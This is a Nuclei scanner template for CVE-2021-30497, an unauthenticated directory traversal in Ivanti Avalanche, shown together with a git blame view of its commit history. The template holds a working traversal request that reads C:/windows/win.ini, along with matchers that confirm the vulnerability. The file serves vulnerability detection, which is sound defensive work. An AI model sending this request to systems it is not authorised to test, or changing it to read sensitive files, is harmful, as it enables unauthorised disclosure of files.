nuclei-templates/cves/2021/CVE-2021-30497.yaml

id: CVE-2021-30497

info:
  name: Ivanti Avalanche Directory Traversal
  author: gy741
  severity: high
  description: A directory traversal vulnerability in Ivanti Avalanche allows remote unauthenticated user to access files that reside outside the 'image' folder
  reference:
    - https://ssd-disclosure.com/ssd-advisory-ivanti-avalanche-directory-traversal/
    - https://forums.ivanti.com/s/article/Security-Alert-CVE-2021-30497-Directory-Traversal-Vulnerability?language=en_US
    - https://help.ivanti.com/wl/help/en_us/aod/5.4/Avalanche/Console/Launching_the_Avalanche.htm
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-30497
  tags: cve,cve2021,avalanche,traversal

requests:
  - method: GET
    path:
      - "{{BaseURL}}/AvalancheWeb/image?imageFilePath=C:/windows/win.ini"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "for 16-bit app support"

      - type: status
        status:
          - 200
Create CVE-2021-30497.yaml Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2021-07-11 09:31:18 +00:00			`id: CVE-2021-30497`

			`info:`
			`name: Ivanti Avalanche Directory Traversal`
			`author: gy741`
			`severity: high`
Description 2021-08-02 09:56:17 +00:00			`description: A directory traversal vulnerability in Ivanti Avalanche allows remote unauthenticated user to access files that reside outside the 'image' folder`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`reference:`
			`- https://ssd-disclosure.com/ssd-advisory-ivanti-avalanche-directory-traversal/`
additional reference to cves templates (#4395) * additional reference to cves templates * Update CVE-2006-1681.yaml * Update CVE-2009-3318.yaml * Update CVE-2009-4223.yaml * Update CVE-2010-0942.yaml * Update CVE-2010-0944.yaml * Update CVE-2010-0972.yaml * Update CVE-2010-1304.yaml * Update CVE-2010-1308.yaml * Update CVE-2010-1313.yaml * Update CVE-2010-1461.yaml * Update CVE-2010-1470.yaml * Update CVE-2010-1471.yaml * Update CVE-2010-1472.yaml * Update CVE-2010-1474.yaml * removed duplicate references * misc fix Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com> 2022-05-17 09:18:12 +00:00			`- https://forums.ivanti.com/s/article/Security-Alert-CVE-2021-30497-Directory-Traversal-Vulnerability?language=en_US`
			`- https://help.ivanti.com/wl/help/en_us/aod/5.4/Avalanche/Console/Launching_the_Avalanche.htm`
Sucuri Website Firewall - Not Configured Default page (#4254) * Add files via upload * Auto Generated CVE annotations [Wed Mar 16 11:29:14 UTC 2022] :robot: * Auto Generated New Template Addition List [Wed Mar 16 13:48:01 UTC 2022] :robot: * moving templates into jolokia directory * duplicate of jolokia-unauthenticated-lfi * merged similar templates into one with updated matchers * Auto Generated New Template Addition List [Wed Mar 23 10:21:57 UTC 2022] :robot: * Delete .new-additions * Auto Generated New Template Addition List [Wed Mar 23 10:22:29 UTC 2022] :robot: * conflict update * Auto Generated New Template Addition List [Wed Mar 23 10:23:39 UTC 2022] :robot: * Auto Generated New Template Addition List [Wed Mar 23 10:26:51 UTC 2022] :robot: * Add files via upload * Auto Generated New Template Addition List [Thu Apr 28 11:25:25 UTC 2022] :robot: * Auto Generated CVE annotations [Thu Apr 28 11:25:55 UTC 2022] :robot: * Update and rename sucuri-webs-firewall-default-page-detect.yaml to sucuri-notconfigured-page-detect.yaml * Auto Generated New Template Addition List [Thu Apr 28 20:25:56 UTC 2022] :robot: * mise update Co-authored-by: GitHub Action <action@github.com> Co-authored-by: sandeep <sandeep@projectdiscovery.io> Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> 2022-04-29 06:44:52 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N`
additional reference to cves templates (#4395) * additional reference to cves templates * Update CVE-2006-1681.yaml * Update CVE-2009-3318.yaml * Update CVE-2009-4223.yaml * Update CVE-2010-0942.yaml * Update CVE-2010-0944.yaml * Update CVE-2010-0972.yaml * Update CVE-2010-1304.yaml * Update CVE-2010-1308.yaml * Update CVE-2010-1313.yaml * Update CVE-2010-1461.yaml * Update CVE-2010-1470.yaml * Update CVE-2010-1471.yaml * Update CVE-2010-1472.yaml * Update CVE-2010-1474.yaml * removed duplicate references * misc fix Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com> 2022-05-17 09:18:12 +00:00			`cvss-score: 7.5`
Sucuri Website Firewall - Not Configured Default page (#4254) * Add files via upload * Auto Generated CVE annotations [Wed Mar 16 11:29:14 UTC 2022] :robot: * Auto Generated New Template Addition List [Wed Mar 16 13:48:01 UTC 2022] :robot: * moving templates into jolokia directory * duplicate of jolokia-unauthenticated-lfi * merged similar templates into one with updated matchers * Auto Generated New Template Addition List [Wed Mar 23 10:21:57 UTC 2022] :robot: * Delete .new-additions * Auto Generated New Template Addition List [Wed Mar 23 10:22:29 UTC 2022] :robot: * conflict update * Auto Generated New Template Addition List [Wed Mar 23 10:23:39 UTC 2022] :robot: * Auto Generated New Template Addition List [Wed Mar 23 10:26:51 UTC 2022] :robot: * Add files via upload * Auto Generated New Template Addition List [Thu Apr 28 11:25:25 UTC 2022] :robot: * Auto Generated CVE annotations [Thu Apr 28 11:25:55 UTC 2022] :robot: * Update and rename sucuri-webs-firewall-default-page-detect.yaml to sucuri-notconfigured-page-detect.yaml * Auto Generated New Template Addition List [Thu Apr 28 20:25:56 UTC 2022] :robot: * mise update Co-authored-by: GitHub Action <action@github.com> Co-authored-by: sandeep <sandeep@projectdiscovery.io> Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> 2022-04-29 06:44:52 +00:00			`cve-id: CVE-2021-30497`
FortiGate config-audit (#4275) * Add files via upload * Auto Generated CVE annotations [Wed Mar 16 11:29:14 UTC 2022] :robot: * Auto Generated New Template Addition List [Wed Mar 16 13:48:01 UTC 2022] :robot: * moving templates into jolokia directory * duplicate of jolokia-unauthenticated-lfi * merged similar templates into one with updated matchers * Auto Generated New Template Addition List [Wed Mar 23 10:21:57 UTC 2022] :robot: * Delete .new-additions * Auto Generated New Template Addition List [Wed Mar 23 10:22:29 UTC 2022] :robot: * conflict update * Auto Generated New Template Addition List [Wed Mar 23 10:23:39 UTC 2022] :robot: * Auto Generated New Template Addition List [Wed Mar 23 10:26:51 UTC 2022] :robot: * Add files via upload * Auto Generated New Template Addition List [Thu Apr 28 11:25:25 UTC 2022] :robot: * Auto Generated CVE annotations [Thu Apr 28 11:25:55 UTC 2022] :robot: * Update and rename sucuri-webs-firewall-default-page-detect.yaml to sucuri-notconfigured-page-detect.yaml * Auto Generated New Template Addition List [Thu Apr 28 20:25:56 UTC 2022] :robot: * mise update * Create config-audit * Delete config-audit * Add files via upload * matcher fixes / ext update / typos update Co-authored-by: GitHub Action <action@github.com> Co-authored-by: sandeep <sandeep@projectdiscovery.io> Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> 2022-05-07 06:49:43 +00:00			`tags: cve,cve2021,avalanche,traversal`
Create CVE-2021-30497.yaml Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2021-07-11 09:31:18 +00:00
			`requests:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/AvalancheWeb/image?imageFilePath=C:/windows/win.ini"`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
			`- "for 16-bit app support"`

			`- type: status`
			`status:`
			`- 200`